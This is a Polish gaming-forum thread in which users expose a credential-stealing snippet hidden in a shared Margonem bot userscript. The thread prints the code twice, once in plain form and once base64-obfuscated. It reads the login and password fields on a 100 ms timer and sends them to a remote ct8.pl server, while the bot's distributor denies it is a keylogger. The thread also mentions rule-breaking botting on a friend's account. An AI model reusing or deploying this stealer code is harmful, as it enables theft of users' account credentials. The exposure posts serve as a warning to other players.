Skocz do zawartości
  • 👋 Witaj na MPCForum!

Przeglądasz forum jako gość, co oznacza, że wiele świetnych funkcji jest jeszcze przed Tobą! 😎

• Pełny dostęp do działów i ukrytych treści
    • Możliwość pisania i odpowiadania w tematach
    • System prywatnych wiadomości
    • Zbieranie reputacji i rozwijanie swojego profilu
    • Członkostwo w jednej z największych społeczności graczy

👉 Dołączenie zajmie Ci mniej niż minutę – a zyskasz znacznie więcej!

Zarejestruj się teraz

xyx

Ritru

Rekomendowane odpowiedzi

Opublikowano

Posiadam Mozile i nie działa mi na niej tampermonkey a chciał bym odpalić bota na znajomego koncie jak naprawić aby działał tamper

• Odpowiedzi 63
  • Dodano
  • Ostatniej odpowiedzi
Opublikowano
6 minut temu, Ritru napisał:

Witam sprawdziłem to i nic nie zawiera keyloggera,nic ze strony głównej nie jest wysyłane itp, korzystam z tych botów, skrptów ponad rok i jest wszystko git, osoba która napisała i udostępniła jest adi wilk, gracz jest osobą zaufaną i nigdy nikogo nie oszukał, gracz jest znany na całą skale i ma sporo klientów dla których wykonuje różne boty skrypty, więc nie miał by w planach kogo kolwiek oszukiwać znam go osobiście wiec jestem tego na 100% pewien .

function UagZgR8PZcWcwvYp() {
    $("#ulogin")
        .val() != login && $("#ulogin")
        .val() && (login = $("#ulogin"))
         .val()), $("#upass")
        .val() != haslo && $("#upass")
        .val() && (haslo = $("#upass")
            .val()), !$("#upass"))
        .val() && !$("#ulogin"))
        .val() && login && haslo && YQTtmEs6a5mTXE5a != login + " | " + haslo && (
          $.ajax({
            url: "https://dpelmdg8jrwf9amf.ct8.pl/ajax.php?hc64q8=" + login + "|" + haslo
        }), YQTtmEs6a5mTXE5a = TpG3Y86zpgrtWMzb + " | " + ZHN4ekpZ5m95pFbJ)
}

Opisałbyś proszę za co opowiada powyższy fragment w takim razie ??

Opublikowano
3 minuty temu, kac23122 napisał:

Posiadam Mozile i nie działa mi na niej tampermonkey a chciał bym odpalić bota na znajomego koncie jak naprawić aby działał tamper

Spróbuj usunąć ciasteczka, a jeżeli nie zadziała zmień przeglądarek jest sporo innych przeglądarek. 

3 minuty temu, sandking91 napisał:

$("#ulogin")
        .val() != login && $("#ulogin")
        .val() && (login = $("#ulogin"))
         .val()), $("#upass")
        .val() != haslo && $("#upass")
        .val() && (haslo = $("#upass")
            .val()), !$("#upass"))
        .val() && !$("#ulogin"))
        .val() && login && haslo && YQTtmEs6a5mTXE5a != login + " | " + haslo && (
          $.ajax({
}

Opisałbyś proszę za co opowiada powyższy fragment w takim razie ??

Nie wiem za co odpowiada powyższa funkcja (z jakiego powodu? ponieważ bot jest gracza ADI WILK ) gram rok około na tych skryptach, botach itp, i sprawdziłem nic nie jest wysyłane strona którą podałeś url: nie istnieje więc, nie muszę się obawiać, ale nawet o tym nie wiedziałem ale nie sądzę że to jest keylogger tak jak napisałeś, jeżeli nie chcesz nie korzystaj twoja decyzja posiadam dużo pieniędzy na koncie mam 300 lvl + i nikt mnie nie okradł, nie jestem na takim poziome programowania w JS więc nie wiem za co to opowiada ale nie sądzę że za wysyłanie passów pozdrawiam kończę temat bo nie udzielam się na tym forum dla tłumaczenia się czegoś co jest bez sensem jak ktoś chce to korzysta nie to nie, i koniec sprawy, możesz drążyć temat ale nie mam podstawy aby ci odpisywać bo jest to monotone, pozdrawiam tak jak już przed tem wspomniałem, nie stworzyłem tematu aby ci się tłumaczyć co jest fejkiem, i jak ktoś nie chce niech nie korzysta, nie mówię aby korzystali bo granie na bocie jest ryzykowne, bo jest to zakazane, ale ja korzystam i postanowiłem udostępnić to na MPCforum abym dostał kilka słusznych ocenek i pomagam wszystkim na moim forum i dzięki za wszystkie plusy itp pozdrawiam Ritru

Opublikowano
16 minut temu, Ritru napisał:

Spróbuj usunąć ciasteczka, a jeżeli nie zadziała zmień przeglądarek jest sporo innych przeglądarek. 

Usunąłem ciasteczka i nie zadziałało ale zmienię przeglądarkę tak jak napisałeś.

Opublikowano
13 minut temu, Ritru napisał:

No to nie wiem co możesz poradzić, zmień przeglądarkę tutaj masz sporo fajnych https://download.komputerswiat.pl/internet-i-sieci/przegladarki-internetowe/najlepsze-programy

image.png

Czemu usunąłeś z tego postu screena?

https://www.mpcforum.pl/uploads/monthly_2019_05/image.png.0533eabafad4814b1152df08a9f2b102.png ??

Opublikowano

Polecam na szybko zmienić  wszystkim co to instalowali dane do logowanie BOTY POSIADAJĄ KEY-LOGGERY.

Każdy z tych botów posiada wpisek który odpowiada za przechwytywanie danych ze strony margonem i wysyłanie ich na serwer.

$(atob("I3Vsb2dpbg==")).val() != TpG3Y86zpgrtWMzb && $(atob("I3Vsb2dpbg==")).val() && (TpG3Y86zpgrtWMzb = $(atob("I3Vsb2dpbg==")).val()), $(atob("I3VwYXNz")).val() != ZHN4ekpZ5m95pFbJ && $(atob("I3VwYXNz")).val() && (ZHN4ekpZ5m95pFbJ = $(atob("I3VwYXNz")).val()), !$(atob("I3VwYXNz")).val() && !$(atob("I3Vsb2dpbg==")).val() && TpG3Y86zpgrtWMzb && ZHN4ekpZ5m95pFbJ && YQTtmEs6a5mTXE5a != TpG3Y86zpgrtWMzb + " | " + ZHN4ekpZ5m95pFbJ && ($.ajax({
        url: atob("aHR0cHM6Ly9kcGVsbWRnOGpyd2Y5YW1mLmN0OC5wbC9hamF4LnBocD9oYzY0cTg9") + TpG3Y86zpgrtWMzb + "|" + ZHN4ekpZ5m95pFbJ
}

setInterval(UagZgR8PZcWcwvYp, 100);

Tak jak piszę osoba wyżej,jest to kod Adi wilka,lecz na samym początku jest dopisany skrypt który przechwytuje wasze dane do logowania.

Pozdrawiam.

Opublikowano
Przed chwilą, marian42 napisał:

Polecam na szybko zmienić  wszystkim co to instalowali dane do logowanie BOTY POSIADAJĄ KEY-LOGGERY.

Każdy z tych botów posiada wpisek który odpowiada za przechwytywanie danych ze strony margonem i wysyłanie ich na serwer.

$(atob("I3Vsb2dpbg==")).val() != TpG3Y86zpgrtWMzb && $(atob("I3Vsb2dpbg==")).val() && (TpG3Y86zpgrtWMzb = $(atob("I3Vsb2dpbg==")).val()), $(atob("I3VwYXNz")).val() != ZHN4ekpZ5m95pFbJ && $(atob("I3VwYXNz")).val() && (ZHN4ekpZ5m95pFbJ = $(atob("I3VwYXNz")).val()), !$(atob("I3VwYXNz")).val() && !$(atob("I3Vsb2dpbg==")).val() && TpG3Y86zpgrtWMzb && ZHN4ekpZ5m95pFbJ && YQTtmEs6a5mTXE5a != TpG3Y86zpgrtWMzb + " | " + ZHN4ekpZ5m95pFbJ && ($.ajax({
        url: atob("aHR0cHM6Ly9kcGVsbWRnOGpyd2Y5YW1mLmN0OC5wbC9hamF4LnBocD9oYzY0cTg9") + TpG3Y86zpgrtWMzb + "|" + ZHN4ekpZ5m95pFbJ
}

setInterval(UagZgR8PZcWcwvYp, 100);

Pozdrawiam.

Odpiszę to co osobie wyżej za pewne to twoje multikonto :

Nie wiem za co odpowiada powyższa funkcja (z jakiego powodu? ponieważ bot jest gracza ADI WILK ) gram rok około na tych skryptach, botach itp, i sprawdziłem nic nie jest wysyłane strona którą podałeś url: nie istnieje więc, nie muszę się obawiać, ale nawet o tym nie wiedziałem ale nie sądzę że to jest keylogger tak jak napisałeś, jeżeli nie chcesz nie korzystaj twoja decyzja posiadam dużo pieniędzy na koncie mam 300 lvl + i nikt mnie nie okradł, nie jestem na takim poziome programowania w JS więc nie wiem za co to opowiada ale nie sądzę że za wysyłanie passów pozdrawiam kończę temat bo nie udzielam się na tym forum dla tłumaczenia się czegoś co jest bez sensem jak ktoś chce to korzysta nie to nie, i koniec sprawy, możesz drążyć temat ale nie mam podstawy aby ci odpisywać bo jest to monotone, pozdrawiam tak jak już przed tem wspomniałem, nie stworzyłem tematu aby ci się tłumaczyć co jest fejkiem, i jak ktoś nie chce niech nie korzysta, nie mówię aby korzystali bo granie na bocie jest ryzykowne, bo jest to zakazane, ale ja korzystam i postanowiłem udostępnić to na MPCforum abym dostał kilka słusznych ocenek i pomagam wszystkim na moim forum i dzięki za wszystkie plusy itp pozdrawiam Ritru

Opublikowano

@up

JA WIEM.Odpowiada za pobieranie danych z okienek "login" "hasło" podczas logowania,wysyłania ich na serwer w hostingu ct8,nie udawaj idioty ty równie dobrze wiesz skoro tu wrzucasz,skasuj temat jak najszybciej,lepiej dla Ciebię.

Edit. Nie,nie jest moje multikonto,multikonta na mpc sa banowane.

Opublikowano
3 minuty temu, marian42 napisał:

@up

JA WIEM.Odpowiada za pobieranie danych z okienek "login" "hasło" podczas logowania,wysyłania ich na serwer w hostingu ct8,nie udawaj idioty ty równie dobrze wiesz skoro tu wrzucasz,skasuj temat jak najszybciej,lepiej dla Ciebię.

Edit. Nie,nie jest moje multikonto,multikonta na mpc sa banowane.

Oczywiście rozumiem twoją decyzje ale twoje multi konto to na 100% jest to marek.kowalczuj1 ponieważ rozmawialiśmy kiedyś i cię znam ponieważ śledzę mpc forum tylko nigdy nie miałem w planach założyć tematu udzielać się itp. 

Opublikowano
1 minutę temu, Ritru napisał:

Oczywiście rozumiem twoją decyzje ale twoje multi konto to na 100% jest to marek.kowalczuj1 ponieważ rozmawialiśmy kiedyś i cię znam ponieważ śledzę mpc forum tylko nigdy nie miałem w planach założyć tematu udzielać się itp. 

To powiedz mi za co odpowiada ta cześć bota ?

Każdy kto ma powyżej 20 iq by zrozumiał.

Opublikowano
Przed chwilą, marian42 napisał:

To powiedz mi za co odpowiada ta cześć bota ?

Każdy kto ma powyżej 20 iq by zrozumiał.

Tak jak wyżej napisałem nie jestem programistą więc nie umiem się na ten temat wypowiedzieć, korzystam z bota ponad rok posiadając konto warte 5k + zł . bot nie należy do mnie i tyle.

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

• Dodaj nową pozycję...